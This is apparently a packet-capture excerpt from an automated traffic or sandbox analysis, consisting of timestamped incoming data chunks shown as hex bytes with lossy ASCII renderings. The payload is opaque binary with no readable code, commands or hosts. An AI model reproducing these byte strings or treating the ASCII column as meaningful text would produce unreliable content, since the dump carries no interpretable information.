                                                                                                                                                                                2021-11-11 11:27:09 UTC9882INData Raw: 50 54 69 5b 08 3f 17 fa 0d c7 f2 d2 ff 92 1c 4e b3 6b 92 1c b7 e2 83 d9 89 5c d3 db 1b ff 90 d6 52 85 ea 0d 03 f7 c0 f2 2c 96 6f e1 e2 2f f4 e8 38 68 d1 58 48 3d 02 f3 4b b3 e8 d6 63 18 d2 f0 5f cc df 5f 3b c4 dc d7 3f f2 0d a6 bb 85 09 2d 4e 40 7b d1 29 f8 3e 5a 48 9b 69 ca b5 8d cf d3 50 a4 eb fe 2c be bf 5c 36 b1 d6 99 45 a5 15 5d d1 7d 0d 79 2e 6d e4 bf e1 f4 2c cb c3 fe 35 4c 3f 46 6e 11 34 b6 53 a8 a6 f5 ea 7a 52 68 20 c1 af 0c 4f db ab d0 d1 f8 62 6e 50 b2 c3 c9 0e 95 4b 2b 5d e1 1b bf 13 5f b4 d7 47 2e 01 b6 49 fd 4f d3 53 aa 49 37 1a db 5f 2b 26 d5 9c 45 98 51 fc f2 30 99 20 c8 69 c5 25 ac 92 73 7c 96 9c 7b 4d 5f 6e 50 e6 3a 50 96 e7 a7 b8 32 6b af 75 34 68 1d 7d c1 74 83 d3 50 47 5b 3e d0 7a 7b 29 b1 36 e4 13 b9 e2 f2 90 26 6c 7f c6 ef 1c 2c 46
                                                                                                                                                                                Data Ascii: PTi[?Nk\R,o/8hXH=Kc__;?-N@{)>ZHiP,\6E]}y.m,5L?Fn4SzRh ObnPK+]_G.IOSI7_+&EQ0 i%s|{M_nP:P2ku4h}tPG[>z{)6&l,F
                                                                                                                                                                                2021-11-11 11:27:09 UTC9883INData Raw: ef d6 8c 77 4e 18 e6 66 f8 84 bf 72 0d 77 d1 ab 13 ad f5 2b af 52 59 ab aa 86 fb 57 32 54 b2 cd 80 1e 14 4d ca 4d 4b c3 a8 17 ec 1a 93 29 67 44 34 44 5a c0 62 ae 8e 50 29 c9 62 ba d7 10 42 3c f3 81 62 b7 2a a1 7a 8e 6d 10 e0 ee 8f 1c d5 30 3f c1 7f a9 98 69 da e3 50 03 85 09 eb 61 dc 04 f7 98 13 e9 c5 91 fa 3c e7 62 fe 97 ca ee ed 90 2a fb cd f1 4a 43 8d 42 58 53 85 c8 9a 1a df 5a e8 c0 0b 57 90 40 3a e1 ec 5e ff 65 de 97 fb 3c 26 1a 35 04 22 c4 68 28 75 58 2b 64 b3 6a bd a8 22 e7 f9 39 ed e4 2f b3 71 ad b9 a3 79 a1 3a 87 6f e3 06 a0 7a a9 fc e1 74 5f dd 31 f2 cc f0 91 ae 0d 9e c1 26 aa 10 a9 54 45 94 f2 dc 5d 9d 26 87 a1 d5 7a 38 1e 36 b9 0d 05 16 31 aa 93 95 0d 8a 86 1d 27 8e bc d3 1b d3 41 86 52 97 5a 7f b8 e3 45 b7 64 02 bc 6c ff f3 03 9e 5f 4f 4c 6d
                                                                                                                                                                                Data Ascii: wNfrw+RYW2TMMK)gD4DZbP)bB<b*zm0?iPa<b*JCBXSZW@:^e<&5"h(uX+dj"9/qy:ozt_1&TE]&z861'ARZEdl_OLm
                                                                                                                                                                                2021-11-11 11:27:09 UTC9884INData Raw: 40 45 b7 ae c8 bc d1 4f 28 6d 76 b7 85 e9 3f b6 53 71 f3 99 28 1b 31 67 0a e2 8c 6c 23 2e 4c 75 6a e5 a6 7e 38 30 4e 81 8d 06 45 e6 c2 2a 77 5e 83 12 c6 99 17 a6 04 32 c5 ab 42 ee 89 7d 24 ab f5 64 54 b0 92 2a 97 05 15 c1 df 06 83 11 a2 11 3c 8b 0e 5e e3 20 3e 2c 28 d7 a5 bf 92 b1 2d ce c0 69 99 73 d7 33 9b 74 69 f9 e2 75 71 9b ff ea 29 b1 6f 77 13 99 f9 12 e9 aa fa 26 7d 2d 28 df 63 02 4b 1c 55 99 85 ae c0 6a e0 b6 49 30 49 0d 71 36 87 86 50 35 6b ef a2 45 8d df 68 ef 6f 46 b2 61 53 47 90 b6 b8 fd 33 db 9d 95 29 3c 40 89 98 ce d5 b7 9c 15 4f 93 85 b6 8b 81 0f af df 67 67 9a 67 f3 bc e0 58 96 a0 81 21 19 5b de 60 b0 84 98 91 67 f3 86 5b 40 3d 5f 6a dd 43 57 65 f0 51 08 f3 aa a8 30 b9 13 bd 78 8f f5 a2 c5 6c 8b 52 b6 ba c7 bb f7 e3 ac ef 81 bf 38 0b 8b 30
                                                                                                                                                                                Data Ascii: @EO(mv?Sq(1gl#.Luj~80NE*w^2B}$dT*<^ >,(-is3tiuq)ow&}-(cKUjI0Iq6P5kEhoFaSG3)<@OgggX![`g[@=_jCWeQ0xlR80
                                                                                                                                                                                2021-11-11 11:27:09 UTC9889INData Raw: 7a fd 90 cf bd 0a 10 c2 1b ff 9c c3 bf 5f ad d9 ab 59 1e 15 1e 97 94 20 30 37 cb 49 a1 b5 87 b5 f5 4b 14 f2 d9 c5 68 9a 19 2d 20 74 c2 04 7f 8e 8a 21 76 55 4d d7 8e 2a 15 f1 91 10 b0 93 59 0f 66 58 ed 16 17 d6 05 47 d8 ff 76 05 3f f9 f4 1c a9 90 6d 3c 2a 8a 0d be 40 57 27 01 d8 b5 f9 fe 89 93 db f9 d9 b0 32 7c 34 e6 0e 04 7d ab 4d fa e8 89 63 79 e5 e0 85 92 1c df 4e e6 d6 ba ea 1c b2 3c 51 00 45 31 2f 60 6b de 22 57 63 97 e6 c5 59 92 82 92 d3 b0 22 bf f0 e3 b2 b2 53 b3 25 49 5c 32 f6 28 ef f7 aa 79 e8 dd 09 d1 69 63 38 91 83 9f b5 d0 f3 b4 7c ff a1 a7 ef a3 52 2f 89 ba 6a ba 29 ed 11 10 e1 cc ad 87 86 b2 da 39 69 8e e2 54 c9 08 3d ff 2c 9e 23 93 ba 82 bd 47 8e 0e 70 32 75 e5 39 57 c7 61 a9 2c 82 be dc dc 81 d3 e2 cb a8 48 39 59 67 d2 18 9b 4e 9b fb e1 b3
                                                                                                                                                                                Data Ascii: z_Y 07IKh- t!vUM*YfXGv?m<*@W'2|4}McyN<QE1/`k"WcY"S%I\2(yic8|R/j)9iT=,#Gp2u9Wa,H9YgN
                                                                                                                                                                                2021-11-11 11:27:09 UTC9893INData Raw: 44 22 c0 4b 45 c4 ba 73 af 35 95 ec bf f1 96 92 7c d9 41 56 5a 22 3a 28 a6 be f6 84 ff 16 6e 9b fa cb d5 13 43 8b 1c 03 2c 22 5a ec 1a bc b7 3a d5 67 01 c5 3d 01 22 e3 9f 29 d7 a9 aa bb 84 d0 e7 ec 98 a1 da 77 61 eb f2 4f 52 af ee a0 e1 c1 6a 4d 9b 7b fb a8 fd e8 c9 dc 0b f9 8d cc 3a e5 f2 3c 17 c9 1e da b4 45 bd e0 00 a0 20 cb 84 fb f9 2c e7 99 ac 20 12 60 74 b1 29 b9 7d 94 03 42 1d cb bb a2 d3 46 b7 f7 f1 37 00 ba d7 e1 e8 2a a8 3f 6d 4e 62 a8 d7 e6 1e 28 81 a4 4c 8b 01 98 a9 b4 5c 19 b5 a8 85 81 e2 c6 dc f6 9f 45 70 6d 1f ad 13 f3 b4 15 18 d5 06 20 6a f9 26 af e7 9c b2 39 f2 2f aa b4 f2 1a 1a ba 67 2b b4 79 a7 fb b6 dd 29 da e0 2c 5f 22 46 98 0a e0 50 66 76 11 c0 7f e2 d9 77 a1 5d c9 2c 8c f5 05 80 a3 46 34 6b 24 b1 55 be 1f 32 ed b0 d8 6b 6c 59 67 98
                                                                                                                                                                                Data Ascii: D"KEs5|AVZ":(nC,"Z:g=")waORjM{:<E , `t)}BF7*?mNb(L\Epm j&9/g+y),_"FPfvw],F4k$U2klYg
                                                                                                                                                                                2021-11-11 11:27:09 UTC9894INData Raw: 43 95 e3 b7 24 39 c4 07 f4 ca 77 e2 f5 5a 25 b0 2f 78 a5 2d 6b 6e 61 41 fd c3 a1 bf 72 3a 88 70 5e 9c 18 3f 2a 07 1c 10 aa 9b 37 e4 b6 6b 4e 26 f0 14 17 2b 97 31 93 2f 2f 53 63 33 56 01 2b b8 2b 25 bf a1 a2 7f 2c 97 2f b9 dd 79 ae 85 be b1 81 13 d3 03 80 7f 3d b7 b5 98 e5 8c c9 9b 1f af ef e6 19 b5 e9 59 13 37 96 84 a9 6f a8 85 a4 d0 1d 49 a7 02 6e a9 d9 6b 31 a3 d5 69 79 14 c3 75 2f aa e9 9c d4 45 f9 c1 a0 78 c6 16 f8 69 8a 62 6c c6 d8 e9 91 31 d6 1a c1 0a ca 87 61 50 10 aa 6d bc 7f 5f 26 74 02 d2 ae 79 6d 3e 36 d3 f9 7f c8 0b b7 7a ba 04 4a 3a b8 4a 03 4b 0f da 5b 31 66 04 52 31 f1 53 48 26 7f b1 22 8c ca e6 f9 b7 81 c4 cf 03 eb 8b 22 3b e0 6a 98 c4 db 8f fd ce c7 51 da 49 12 05 c8 d5 53 4e 02 c6 93 1b 9d 57 63 18 b5 da ac 01 ca e3 81 b9 a6 4c 32 4e 4e
                                                                                                                                                                                Data Ascii: C$9wZ%/x-knaAr:p^?*7kN&+1//Sc3V++%,/y=Y7oInk1iyu/Exibl1aPm_&tym>6zJ:JK[1fR1SH&"";jQISNWcL2NN
                                                                                                                                                                                2021-11-11 11:27:09 UTC9898INData Raw: a4 de 14 51 e0 01 1b d1 e2 73 69 17 21 27 e4 94 cc 31 fb 05 16 d3 ab 4e e9 4a f4 8d 87 dd 4b 8a 13 94 87 d8 4a 64 5f de f6 60 5a 4a a0 db 91 a5 2a 5a 92 69 83 7e 49 ae 13 dd 32 68 0a dc d1 42 a7 9d b7 6e c2 54 e0 0a a4 90 3a ba 71 3b ab 1a 3d 3e 5f 3e 6c a3 98 08 a1 8b 99 f8 08 d6 68 62 58 51 ba a9 85 e8 47 8b 6d c1 56 24 0a 6b 61 95 65 e0 01 f1 a0 30 ee 21 a5 b7 bf b5 86 da 12 40 a5 35 bc 4d 16 98 2d 3b 45 ed 86 fd 5a dc 93 5a 79 28 4b e6 59 93 59 ec a5 f9 60 21 69 4e 94 7b 5a cd 3d ed f3 e6 35 58 6b a8 68 ae ef 6e 9f 5c d0 59 1b 98 50 34 82 b6 c2 85 b4 81 14 ea 2e aa 2c ff 1f df 5f 0b a0 3d 86 93 a7 7d e0 df 55 ba 7a 07 12 96 df b8 1d ae 85 f4 7d ef 1b 71 3b b7 cd fc 6a ae 6c e7 92 e5 f4 c5 24 f0 dc 34 41 99 41 ce 35 9b 70 d2 1f e6 2e 9f 71 ba f4 d5 99
                                                                                                                                                                                Data Ascii: Qsi!'1NJKJd_`ZJ*Zi~I2hBnT:q;=>_>lhbXQGmV$kae0!@5M-;EZZy(KYY`!iN{Z=5Xkhn\YP4.,_=}Uz}q;jl$4AA5p.q
                                                                                                                                                                                2021-11-11 11:27:09 UTC9902INData Raw: 39 42 8d 50 99 62 13 72 b6 e3 e7 37 98 8a 4d 53 49 0e 52 fa 38 14 ca 00 6e 2b 02 2b eb 9f d8 84 f0 59 27 5f 89 b4 8f 92 57 ce ac 5d fd 3b 03 e7 95 12 bd 85 31 00 cf c0 d2 2d 8e c6 63 eb 95 bc a2 e1 41 61 ff 27 86 3f 91 14 6c 39 10 00 ce f4 29 e3 6f c5 df 26 88 05 d7 af c5 0f 92 02 d6 58 cb 60 ce 25 c7 d7 d1 86 27 f1 f4 18 32 36 f9 0e 7d d1 56 7a c5 56 b0 f9 04 42 2e b1 59 53 09 95 53 b0 2e ed eb 3f 86 e5 c1 67 41 e0 cf 3a 8e 46 68 96 8f 08 6d ab 2f e9 9e a8 b5 19 2d a7 4a 55 d5 2f 8e 2b eb 59 d6 62 41 b8 dd d8 e9 81 65 47 f3 bb df 59 6e 26 98 76 99 40 d7 6c 61 ff 40 ef 52 f6 34 98 17 3c 8b f9 53 97 af ad 22 43 03 37 b7 e9 9f b6 ba 43 bf 8b d5 79 7a 3f 1d 32 40 2b f5 57 f2 23 6a 40 ea 26 f9 7f 4e 96 9c bf 7a 84 e9 2c b9 79 b5 eb fc 94 34 ec 4c b6 d6 63 09
                                                                                                                                                                                Data Ascii: 9BPbr7MSIR8n++Y'_W];1-cAa'?l9)o&X`%'26}VzVB.YSS.?gA:Fhm/-JU/+YbAeGYn&v@la@R4<S"C7Cyz?2@+W#j@&Nz,y4Lc
                                                                                                                                                                                2021-11-11 11:27:09 UTC9906INData Raw: 23 b1 2c 49 2c 28 91 79 73 e1 00 4f 6a 9e a2 b8 3f 24 90 92 40 90 f1 d4 66 5e e4 ab 95 35 01 a2 be e9 a6 27 3f 05 5e 7e 13 ea 3e 29 79 2e 29 a5 10 c4 72 be 4f 98 e9 06 29 ee b2 21 0c 0b c6 4d 4c 90 78 22 1a 86 73 21 22 1d 80 4a f2 8d b9 55 d4 fe d9 42 32 c4 e5 95 e2 7b 66 49 50 a5 40 f5 98 26 08 0a c5 e2 52 be ff 2a 1b ff ae b8 81 31 59 99 23 e8 8f 2b 64 c1 be aa 01 db f5 eb 19 5b 96 6f 04 6c c6 77 d9 9a f1 fd a1 00 af e9 58 99 b3 da 62 59 2c 3e 24 8b 1b e8 4c 09 22 ba 68 c4 65 aa 49 c2 fc 61 79 de 67 eb 29 4d b2 92 7a 57 93 e3 2b ed 5b 07 78 22 18 06 68 ae ff 37 4b 36 a5 22 41 a4 be 3a 81 b9 76 f3 31 c1 b7 10 f2 1c 87 86 89 d1 04 af 60 3f 6b 45 d2 6f a4 d6 81 b6 ac d1 02 f5 f9 15 eb f9 49 e6 70 59 4d eb 19 2e 5f 81 3e 5b 55 90 2b 2f 34 4e e2 1d c7 1d 5d
                                                                                                                                                                                Data Ascii: #,I,(ysOj?$@f^5'?^~>)y.)rO)!MLx"s!"JUB2{fIP@&R*1Y#+d[olwXbY,>$L"heIayg)MzW+[x"h7K6"A:v1`?kEoIpYM._>[U+/4N]
                                                                                                                                                                                2021-11-11 11:27:09 UTC9910INData Raw: 21 4b 93 69 34 0d d8 68 f0 d3 97 74 91 57 52 fc d2 a1 ff dc 80 ca 25 6f f1 9f 48 3a 6b e1 55 2e 8a ea ea 6b b6 1b 95 80 3c 42 34 f7 8a 53 5a 60 76 61 4e ba b9 91 53 e7 3e 49 de 31 83 d3 c4 b4 d2 a5 b2 3e 2f 60 88 4f 7c d5 56 9e 0f a2 81 aa 41 76 99 bf f6 ef 7e 09 ed 4f e9 40 3b 50 52 9e 99 69 41 ea 46 5a 31 23 f5 c0 d6 a4 00 2a 50 83 66 9b d6 f1 6b e1 58 3c 0c 08 9d 22 be d2 df a8 29 e1 c7 15 84 6f 29 9e 49 11 da e9 e7 5b 2a 1b b4 da e9 89 78 1e 1a 26 77 1b f4 91 bb 48 a4 04 92 10 ea 53 eb c9 38 a4 b1 ac fb c2 e5 0e f0 fc a1 b1 db 36 6f 5d 89 91 bf 5e ad b2 d9 8c ce c6 90 70 dd 2b 82 6e 9e f8 a0 f6 e9 10 e2 f0 2f 79 a7 e9 94 ea c2 51 ec cc db 0f d2 12 1c ef 09 44 7a 2e a1 4c 37 61 4a 0c 26 5d 35 14 da 8e f3 43 39 da 00 af e8 86 e0 69 5c 15 99 4a db 00 8b
                                                                                                                                                                                Data Ascii: !Ki4htWR%oH:kU.k<B4SZ`vaNS>I1>/`O|VAv~O@;PRiAFZ1#*PfkX<")o)I[*x&wHS86o]^p+n/yQDz.L7aJ&]5C9i\J
                                                                                                                                                                                2021-11-11 11:27:09 UTC9914INData Raw: 5f e5 a5 e1 8a b8 4a 2e 0a 0f 54 ec 24 6c 0a a1 f2 a7 52 19 96 de 15 2f 56 df 37 dd 89 6e 68 47 86 bd a9 72 ca 08 8f 4e df dc ca e3 20 5e 2a ca 95 d8 d2 6b 83 ba e5 2e 75 9b 59 e3 49 9a e3 7c 95 43 bf 1e dd ca 78 a5 f6 fc b2 85 09 28 9c 77 9b 95 8b af 79 9b 57 4f bb 56 3b ca e6 31 61 03 79 75 32 52 c4 aa 6e e7 14 14 94 e3 bf 6b d2 85 81 6b a0 1e 6c 70 88 83 03 d1 96 26 23 68 97 31 05 c5 e9 69 6e 13 98 05 f3 94 fe 7b 98 03 49 07 50 54 9d 26 1b fb 2a cb c1 73 bd da a4 70 54 cc 65 8d d1 50 c9 b8 c6 62 93 9d c9 e9 82 e9 70 a9 42 bd 6a 1e 0b a2 67 74 16 8b 74 02 23 c1 fc b5 29 e2 87 6a d5 2e 95 b8 23 5e 2a 28 42 a6 e7 a0 a4 b4 39 2f 12 cb 87 2c a2 bf 2f 25 17 49 92 0f 6e 1d 21 18 05 81 6a 46 a5 34 bf f8 02 71 50 62 72 f1 97 e8 2b bd b9 8d 0b eb fd 56 b2 31 c4
                                                                                                                                                                                Data Ascii: _J.T$lR/V7nhGrN ^*k.uYI|Cx(wyWOV;1ayu2Rnkklp&#h1in{IPT&*spTePbpBjgtt#)j.#^*(B9/,/%In!jF4qPbr+V1
                                                                                                                                                                                2021-11-11 11:27:09 UTC9918INData Raw: 94 86 da 55 a3 f3 e8 93 72 c5 2d 93 2b c9 67 37 5c 8e a9 26 12 b2 6b b1 4e 96 5b 23 b9 d2 31 d1 7d e9 97 12 d1 79 db 3a b6 33 ae 82 87 d1 ce 94 ac 7d 69 cf 7b 15 11 e9 27 57 22 87 18 d3 c0 c5 20 09 2b a3 a7 b7 2a 82 d8 b4 da 04 db 79 5f 01 8b 91 b9 54 af d8 a7 b2 2b 6b 91 d1 69 b9 6f 12 31 77 e1 22 55 ec 8c da 6d 95 03 30 05 aa 44 12 37 73 91 39 4f b5 37 cf 55 38 3b 11 7a ab b0 84 ea 9c e5 65 7b 58 ca af c2 41 c6 9c 31 92 bd c6 b7 a3 9a 97 d8 43 3e 97 26 e8 ff 97 dd e1 f4 21 19 1a ca 12 a9 ef 54 72 d8 29 fa 22 b8 e2 d6 71 7c 18 cc 50 f3 ad cc b1 45 78 b5 dc 1a 30 be cd fd 0f e7 85 e4 a1 61 54 f8 a9 30 39 4e a3 95 7a 34 cf 03 12 1b c3 8a 81 a8 66 7b d9 d4 7d f0 46 28 f0 7b 41 63 fa df 0b 25 b2 45 ab 23 9b 4b 0b e4 7a 6e 50 a3 a3 da 78 4f 44 18 1c 8e d1 ec
                                                                                                                                                                                Data Ascii: Ur-+g7\&kN[#1}y:3}i{'W" +*y_T+kio1w"Um0D7s9O7U8;ze{XA1C>&!Tr)"q|PEx0aT09Nz4f{}F({Ac%E#KznPxOD
                                                                                                                                                                                2021-11-11 11:27:09 UTC9923INData Raw: b2 f7 ca 47 0a 6e 67 38 1b b6 54 a4 49 2a dd 2d f4 4e c8 07 bb e3 f7 06 50 36 99 2b ad 4e 01 b3 30 a3 43 89 b0 1f 47 ec 44 da 66 e1 63 a5 17 f8 90 10 13 c1 98 5a 70 22 33 fd eb 80 90 d8 79 ee 3f 56 4a 11 95 6e f3 e3 7e 77 33 57 75 9e cd df 33 32 26 5e e8 4f f6 df 31 b1 67 21 a7 a4 a5 da b3 f1 d5 e9 2b 38 27 eb b0 a6 7b 39 4e d8 79 a5 45 28 55 75 90 db c6 0f df f7 db 11 46 ef cf 76 d0 69 e1 d2 44 2a e6 f9 bb ea 21 8d 3f 39 7a 9b ef a3 f4 66 7b 38 1a 29 6b fe 2b 5b a9 4d a4 22 74 fa 09 63 78 7a 63 9a 3b 31 b4 10 ee 4f 43 69 3f ee 81 4d 12 37 89 6e a1 82 62 5e 20 3c 8e 21 0c 24 9c 80 88 f8 88 5d 64 54 86 b1 b8 fa d8 62 71 68 90 ff f7 e6 0c 83 1d 78 97 9b 77 b6 2e 21 ec f4 c1 9b 7d ba 87 41 b7 e1 d1 de 1a c6 ea 2a 63 e9 14 5d 6a 32 f4 4b 4f e3 f3 90 50 60 e3
                                                                                                                                                                                Data Ascii: Gng8TI*-NP6+N0CGDfcZp"3y?VJn~w3Wu32&^O1g!+8'{9NyE(UuFviD*!?9zf{8)k+[M"tcxzc;1OCi?M7nb^ <!$]dTbqhxw.!}A*c]j2KOP`
                                                                                                                                                                                2021-11-11 11:27:09 UTC9926INData Raw: 29 d2 9c 0b d3 6e fd 04 2b 48 56 27 e2 5d 4e 72 64 8c de 42 d2 60 d6 e6 68 52 c1 82 3d b6 e1 6c a7 19 2d e5 2c 86 1e 35 ed 67 fa bd f7 be 4a 13 58 21 b9 46 57 42 cf af e6 1d 1f 68 30 67 c4 b1 89 91 d3 6d fb 0b 1b ac f6 d7 80 32 6e 85 f9 e8 e7 59 8d 1f 48 06 44 70 b8 32 a9 5e f2 61 b7 78 b8 39 af 0b 54 72 fd 97 30 b7 6d d5 99 85 45 c7 5e 4d 97 b5 15 f8 b8 19 73 63 1e 4b 94 79 ec 63 e3 4c 4d 64 45 41 06 97 1b af bf 97 1a f2 fe 71 57 df 25 3d f5 ad 83 69 37 3a a1 09 bc e8 98 ab 37 d6 e1 ea 22 a1 ba 4b 4a 04 c4 d3 ee 23 b1 c4 b9 a0 14 64 f5 48 c3 01 4e 78 82 44 0c ff 80 f5 fa 17 24 69 18 e7 24 7e 69 dc da c6 4e 17 1b 97 61 97 ab 2a 0b 69 29 be 1c e1 e2 b9 8e b7 5c 61 b0 bf d9 15 9a 51 4e a5 f3 f9 35 9c ed f2 3f a9 fc 4e e9 15 fe 57 3e 49 b5 d5 32 14 92 83 5d
                                                                                                                                                                                Data Ascii: )n+HV']NrdB`hR=l-,5gJX!FWBh0gm2nYHDp2^ax9Tr0mE^MscKycLMdEAqW%=i7:7"KJ#dHNxD$i$~iNa*i)\aQN5?NW>I2]
                                                                                                                                                                                2021-11-11 11:27:09 UTC9930INData Raw: e3 0a bf 22 18 c6 48 b2 2a 6b 99 20 d8 0d c4 bd 2c 62 8a 31 b7 45 a3 7d 35 76 88 20 f7 d4 42 fe 37 9b 26 cb 46 dd 28 6a 61 cf f4 39 67 1b 75 99 20 a1 98 3e 9d 85 e7 29 a5 ab b3 2d 9f a9 c6 42 c4 22 ac 37 a4 ae 04 c3 15 45 2a 5c 1e 3b ab 8d ff 79 09 43 ad 50 57 f0 3b 58 08 8d 67 44 a5 78 76 29 3e 9d 41 e8 ab b5 50 42 f7 5c 29 7f 77 8b 03 f6 7c 50 9c 82 40 41 cc 37 70 ca 56 04 25 33 e9 83 9c 51 38 3d ea 38 a0 0d fa a7 14 57 d8 2b 0c 9a ff 9e 1e da 90 91 c2 e4 df 6b d2 8c ab b6 09 c7 9c a4 f2 64 e6 71 9c 62 19 bd e1 86 a9 b0 21 d6 40 96 12 5f 48 d0 80 9d 4f 5b 41 87 28 65 b2 3b bf 4d 6f fb c0 9b 63 d1 2a bc 81 73 ec 84 1f 0e 05 21 29 d2 00 4e ec b1 a4 b8 e8 2b c0 c8 47 ab 76 42 bd 8a 09 67 32 bd f6 95 5a 81 c9 95 4a 22 29 a0 63 9f cb a4 6b e1 ff ea d0 4e df
                                                                                                                                                                                Data Ascii: "H*k ,b1E}5v B7&F(ja9gu >)-B"7E*\;yCPW;XgDxv)>APB\)w|P@A7pV%3Q8=8W+kdqb!@_HO[A(e;Moc*s!)N+GvBg2ZJ")ckN
                                                                                                                                                                                2021-11-11 11:27:09 UTC9934INData Raw: b4 5c 0f e3 62 4f 2f b9 a9 6f d2 8d 25 63 a8 49 4e b6 c6 78 99 92 97 79 dc 98 92 69 e1 a7 8b c9 ec 77 6d cb 61 84 d7 ff dd b4 db 86 14 89 fb 49 e4 8f ab 15 df f6 e6 79 f5 46 78 d7 07 03 f0 1c 34 2a b4 4c a4 7c 41 eb 6c 09 52 d8 b3 13 be 09 9d 34 fc 42 34 c4 c2 6d e9 04 2a 84 e5 e1 8d 49 3f fc 0b 48 0c a8 88 60 4e 46 30 d2 08 8e 7a 8b 45 5a 2e 74 54 69 b2 5a 36 18 1e 6f 2c 7b b7 5e fd 01 59 d6 f5 28 a1 76 79 31 d8 38 63 12 af ae 8b 27 c5 1f e9 f4 fe ec e8 a7 e1 29 70 7b 17 a8 50 00 9a 68 c4 51 37 f6 ad 91 c7 4e 13 e9 7f f2 5d f9 d9 4b 5e 4c 37 1b e6 bd 6b 31 22 a5 aa a9 9a 16 8b 64 d2 63 9b 4b 6a 1e 2e 61 09 72 ba 65 ea 92 d4 a8 fa d1 ea 7b 10 5e ef a4 9f 6e f5 42 c4 7b a5 dd 7f 39 ff cd 6c a3 cd f5 69 3a 78 09 d3 c5 68 fa 83 18 f2 e5 de b0 8a 81 ba 8d ee
                                                                                                                                                                                Data Ascii: \bO/o%cINxyiwmaIyFx4*L|AlR4B4m*I?H`NF0zEZ.tTiZ6o,{^Y(vy18c')p{PhQ7N]K^L7k1"dcKj.are{^nB{9li:xh
                                                                                                                                                                                2021-11-11 11:27:09 UTC9938INData Raw: c2 f4 d8 ce 7f 4e d5 87 86 c4 69 b4 a8 11 35 0f e7 e4 41 c2 78 81 ac 94 eb 74 4d 32 43 95 04 71 df 5c 61 9a f3 88 59 8b bd c3 3e b0 95 7c c6 2d 8f 16 25 0d a5 86 be 67 92 88 c3 27 bb b5 46 93 a8 07 ae e0 68 a5 20 1a 69 33 b9 09 51 9b 7e 15 7b 80 95 3a 51 67 e5 36 5a a9 48 82 ba 83 d8 88 00 1c e5 f2 45 31 62 d6 16 70 51 27 96 fa 58 a9 92 f4 13 69 66 9b 98 6f c9 47 48 63 7b da 93 20 70 2d 95 71 c1 51 7f 21 41 69 a3 d8 79 63 55 7f fc f4 e6 af 04 a0 2f c7 48 4b 4f 63 c9 b3 c4 8f bc 3f 69 29 71 65 27 36 e8 58 47 da b3 97 d5 97 b4 3b 55 13 6f 54 ec 64 4b a6 4a f2 f8 30 2b a1 ff d0 f2 3d b0 f0 96 6d 47 f9 0a 86 f7 37 8c 15 d9 1e 62 bd 51 c0 cc ad 41 c0 84 3d 83 ca 1b b3 e3 9b 1f 0c 43 63 3c 83 a8 1e 7d 48 f3 80 61 d2 b0 ba b6 e6 be 4d 6a d6 f6 85 51 ef fa 56 d6
                                                                                                                                                                                Data Ascii: Ni5AxtM2Cq\aY>|-%g'Fh i3Q~{:Qg6ZHE1bpQ'XifoGHc{ p-qQ!AiycU/HKOc?i)qe'6XG;UoTdKJ0+=mG7bQA=Cc<}HaMjQV
                                                                                                                                                                                2021-11-11 11:27:09 UTC9942INData Raw: 6e 62 fe c6 2a 24 fa 92 ff de 0d 06 4f a9 97 dd 88 44 2f 69 d2 f8 da 4f 30 bc 97 b5 69 f8 f2 ba aa 61 13 ef a5 f1 32 b7 61 ab ea cb 9b b3 f3 7c 85 9c 7b 04 f5 ed 8a 8f 68 79 81 68 6c ed 4c 9f b8 bb 3c dd 93 2d 86 6e 48 41 d8 30 1b 07 f3 1b 71 1e d1 cf 90 92 3c 98 f6 0b 08 a0 af 54 66 1d b6 6b bd 00 84 67 9a 2b 4a 98 ea 68 9e 70 f4 97 75 3a e8 6f 5d 08 3b 23 95 d7 2f af e9 95 d2 24 ba a8 e8 e1 a8 35 e2 1a b3 09 0a c8 84 1a c2 f4 b9 df 7d 5b 55 d3 73 e4 8e 73 f7 b1 7b 92 2f ab 33 60 e0 97 2e aa e7 1b 1f 6b b9 eb 38 72 f6 cf a0 f7 96 99 78 01 98 f7 b7 51 6b 4d 60 93 ad 27 38 27 50 01 61 65 46 e9 a7 32 77 46 c3 19 10 ba dc bd ea 30 bf 29 ad 31 dd 43 f4 b8 e7 64 c4 62 bf 29 94 37 dc 72 9d 50 88 49 ef 69 88 70 e3 bf ad ff fb 9b a4 8a e6 bb d7 5a 6d d6 16 b7 ee
                                                                                                                                                                                Data Ascii: nb*$OD/iO0ia2a|{hyhlL<-nHA0q<Tfkg+Jhpu:o];#/$5}[Uss{/3`.k8rxQkM`'8'PaeF2wF0)1Cdb)7rPIipZm
                                                                                                                                                                                2021-11-11 11:27:09 UTC9946INData Raw: fe aa 98 00 95 7e a3 0f 63 63 de be 51 67 b4 e7 eb a1 2d 29 33 78 1a bc 74 58 90 b8 d1 e2 3d cc 74 5e 21 c6 24 10 2f b6 b2 eb 32 a0 c8 43 4f d1 73 d4 50 eb b2 5f d5 9b 0e fd 9a 8b 31 98 7a da 40 6f 53 66 f9 00 a5 ca 9d c1 be 8d 1e 4e 6e 19 da ca 20 e5 74 06 ed 37 11 84 87 77 6a 97 29 36 7d 56 f4 c1 2a 83 9b d8 62 ec e3 f1 55 97 30 30 9d d0 4d bc e8 26 44 fa a6 aa c9 15 66 3b 11 56 fd 18 23 f2 3f 5f 97 89 bb fd 27 0b 1f 5d de 1e f6 92 9b 96 77 90 bf 5e 4c a4 92 6a 27 12 cc 81 74 e5 cc b1 be f9 28 a1 88 b6 be 32 8c 30 bc 75 06 ef d5 9a 1d c7 28 8a 5b c1 af 57 72 6a 2d 2e 6e 5d c3 21 92 5c b4 7c 76 dd 17 e6 d0 3c b5 76 46 5a ad b7 b2 1c 70 30 61 5f eb 6c 51 eb 67 a7 55 dd 5d 4f e0 7b a6 8c df 53 f4 a4 73 64 57 ef 5e 79 05 dc 44 cf 77 e6 a8 c0 40 3e 95 ca ad
                                                                                                                                                                                Data Ascii: ~ccQg-)3xtX=t^!$/2COsP_1z@oSfNn t7wj)6}V*bU00M&Df;V#?_']w^Lj't(20u([Wrj-.n]!\|v<vFZp0a_lQgU]O{SsdW^yDw@>
